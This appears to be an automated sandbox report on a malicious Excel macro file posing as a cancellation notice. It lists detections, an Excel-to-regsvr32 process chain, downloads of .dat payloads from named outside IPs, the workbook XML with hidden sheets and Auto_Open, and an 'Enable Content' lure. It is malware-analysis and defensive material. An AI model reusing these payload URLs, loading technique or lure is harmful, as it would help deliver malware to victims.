Loading ...

Play interactive tourEdit tour

Analysis Report Cancellation_1844611233_06082021.xlsm

Overview

General Information

Sample Name:Cancellation_1844611233_06082021.xlsm
Analysis ID:431666
MD5:245c3e542030fb5f37cc1786c6d2ad52
SHA1:d3659467af26b5cf1773b69bd6b9820b1b777dcb
SHA256:72da5a8ba62bc25dfbe12f189664117f79db3fcf2d539e3b1f8abc3923e8a2ea
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2060 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 -s ..\Post.storg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2784 cmdline: regsvr32 -s ..\Post.storg1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 -s ..\Post.storg2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
intlsheet4.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\Post.storg, CommandLine: regsvr32 -s ..\Post.storg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2060, ProcessCommandLine: regsvr32 -s ..\Post.storg, ProcessId: 2908

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Cancellation_1844611233_06082021.xlsmVirustotal: Detection: 26%Perma Link
    Source: Cancellation_1844611233_06082021.xlsmReversingLabs: Detection: 32%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80
    Source: Joe Sandbox ViewIP Address: 51.89.115.125 51.89.115.125
    Source: global trafficHTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 51.89.115.125
    Source: unknownTCP traffic detected without corresponding DNS query: 103.155.92.95
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61190FA7.tifJump to behavior
    Source: global trafficHTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive
    Source: regsvr32.exe, 00000003.00000002.2173436473.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2174040381.0000000001E50000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2175172538.0000000001DA0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En
    Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4B72C346-643F-4012-BBC8-4BEF893AE02B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: classification engineClassification label: mal76.expl.evad.winXLSM@7/7@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Cancellation_1844611233_06082021.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBEDB.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Cancellation_1844611233_06082021.xlsmVirustotal: Detection: 26%
    Source: Cancellation_1844611233_06082021.xlsmReversingLabs: Detection: 32%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storgJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Cancellation_1844611233_06082021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Cancellation_1844611233_06082021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Cancellation_1844611233_06082021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: Cancellation_1844611233_06082021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: Cancellation_1844611233_06082021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: intlsheet4.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Cancellation_1844611233_06082021.xlsm26%VirustotalBrowse
    Cancellation_1844611233_06082021.xlsm33%ReversingLabsScript.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://103.155.92.95/44356.227524537.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://51.89.115.125/44356.227524537.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://103.155.92.95/44356.227524537.datfalse
    • Avira URL Cloud: safe
    unknown
    http://51.89.115.125/44356.227524537.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2173436473.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2174040381.0000000001E50000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2175172538.0000000001DA0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    103.155.92.95
    unknownunknown
    134687TWIDC-AS-APTWIDCLimitedHKfalse
    51.89.115.125
    unknownFrance
    16276OVHFRfalse
    45.144.31.105
    unknownUnited Kingdom
    42994HQservCommunicationSolutionsILfalse

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:431666
    Start date:09.06.2021
    Start time:05:27:12
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Cancellation_1844611233_06082021.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal76.expl.evad.winXLSM@7/7@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    51.89.115.125275a4797_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44337.843103588.dat
    275a4797_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44337.8380305556.dat
    e43014f7_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44335.7228642361.dat
    e43014f7_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44335.717878125.dat
    Debt-Details-689802216-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44333.6516760417.dat
    Debt-Details-689802216-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44333.642149537.dat
    OHTwo9pVp7.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44330.4712299769.dat
    OHTwo9pVp7.xlsxGet hashmaliciousBrowse
    • 51.89.115.125/44330.4665063657.dat
    Debt-Details-717769301-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44330.0182956019.dat
    Debt-Details-717769301-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44330.013627662.dat
    Debt-Details-1329792461-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44329.8506186343.dat
    Debt-Details-1329792461-05132021.xlsmGet hashmaliciousBrowse
    • 51.89.115.125/44329.8456546296.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    TWIDC-AS-APTWIDCLimitedHKRebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
    • 103.155.93.93
    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
    • 103.155.93.93
    2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
    • 103.155.82.236
    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
    • 103.155.92.221
    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
    • 103.155.92.221
    DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
    • 103.155.82.236
    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
    • 103.155.92.221
    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
    • 103.155.92.221
    PO (2).exeGet hashmaliciousBrowse
    • 103.153.182.50
    PO.exeGet hashmaliciousBrowse
    • 103.153.182.50
    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
    • 103.155.93.185
    Outstanding_Debt_591538347_05242021.xlsmGet hashmaliciousBrowse
    • 103.155.92.157
    Outstanding_Debt_591538347_05242021.xlsmGet hashmaliciousBrowse
    • 103.155.92.157
    3e53db5d_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 103.155.92.82
    1271494c_by_Libranalysis.xlsxGet hashmaliciousBrowse
    • 103.155.92.82
    OVHFRTax Folder.docGet hashmaliciousBrowse
    • 145.239.131.51
    WlMsy0a1CN.exeGet hashmaliciousBrowse
    • 79.137.109.121
    #Ud83d#Udda8rocket.com 1208421(69-queue-2615.htmGet hashmaliciousBrowse
    • 145.239.131.51
    E91sLsvV8S.exeGet hashmaliciousBrowse
    • 144.217.14.109
    f.xlsGet hashmaliciousBrowse
    • 51.77.82.110
    50681.dllGet hashmaliciousBrowse
    • 51.77.82.110
    50681.dllGet hashmaliciousBrowse
    • 51.77.82.110
    SecuriteInfo.com.VB.Trojan.Valyria.4710.541.xlsGet hashmaliciousBrowse
    • 51.77.82.110
    fodeb.exeGet hashmaliciousBrowse
    • 51.222.195.7
    ayowa.exeGet hashmaliciousBrowse
    • 51.222.195.7
    Payment slip.exeGet hashmaliciousBrowse
    • 213.186.33.5
    03062021.exeGet hashmaliciousBrowse
    • 51.195.43.214
    A4C57DF59F0C85EEBCB7B40263D8C3DE037F41B7D2D43.exeGet hashmaliciousBrowse
    • 46.105.204.2
    ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
    • 54.38.220.85
    ConsoleApp1.exeGet hashmaliciousBrowse
    • 51.222.195.7
    http___pbfoa.org_d.exeGet hashmaliciousBrowse
    • 142.4.200.50
    cryptowall.exeGet hashmaliciousBrowse
    • 188.165.164.184
    treetop-payroll-075491-pdf.HtmLGet hashmaliciousBrowse
    • 145.239.131.51
    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 51.195.38.35
    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
    • 51.195.38.35
    HQservCommunicationSolutionsILzzOGYFgy8q.exeGet hashmaliciousBrowse
    • 45.144.29.9
    tX6uSJFGyw.exeGet hashmaliciousBrowse
    • 45.144.29.9
    SecuriteInfo.com.Trojan.PWS.Stealer.30553.25052.exeGet hashmaliciousBrowse
    • 91.194.11.86
    hTe3jpKXnE.exeGet hashmaliciousBrowse
    • 45.144.29.9
    order 05.21.docGet hashmaliciousBrowse
    • 45.144.29.189
    order 05.21.docGet hashmaliciousBrowse
    • 45.144.29.189
    order 05.21.docGet hashmaliciousBrowse
    • 45.144.29.189
    SecuriteInfo.com.Downloader-FCEIFE04EE03A3CA.23702.xlsxGet hashmaliciousBrowse
    • 45.144.29.69
    SecuriteInfo.com.Downloader-FCEIFE04EE03A3CA.23702.xlsxGet hashmaliciousBrowse
    • 45.144.29.69
    SecuriteInfo.com.Heur.18790.xlsxGet hashmaliciousBrowse
    • 45.144.29.69
    SecuriteInfo.com.Heur.18790.xlsxGet hashmaliciousBrowse
    • 45.144.29.69
    21975030260_05262021.xlsmGet hashmaliciousBrowse
    • 45.144.29.69
    21975030260_05262021.xlsmGet hashmaliciousBrowse
    • 45.144.29.69
    IMjQ2nitdj.exeGet hashmaliciousBrowse
    • 45.144.29.143
    p24PN6HEuu.exeGet hashmaliciousBrowse
    • 45.144.29.143
    KERdk635uE.exeGet hashmaliciousBrowse
    • 45.144.29.143
    IMjQ2nitdj.exeGet hashmaliciousBrowse
    • 45.144.29.143
    YgwtJM23Kw.exeGet hashmaliciousBrowse
    • 45.144.29.143
    54WMahvN3N.exeGet hashmaliciousBrowse
    • 45.144.29.143
    KERdk635uE.exeGet hashmaliciousBrowse
    • 45.144.29.143

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61190FA7.tif
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:TIFF image data, little-endian, direntries=19, height=1600, bps=53710, compression=LZW, PhotometricIntepretation=RGB, width=1600
    Category:dropped
    Size (bytes):315878
    Entropy (8bit):7.988901270632308
    Encrypted:false
    SSDEEP:6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD
    MD5:BB737290D394078D8A16D5509C5BC970
    SHA1:C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E
    SHA-256:E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5
    SHA-512:3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A
    Malicious:false
    Reputation:moderate, very likely benign file
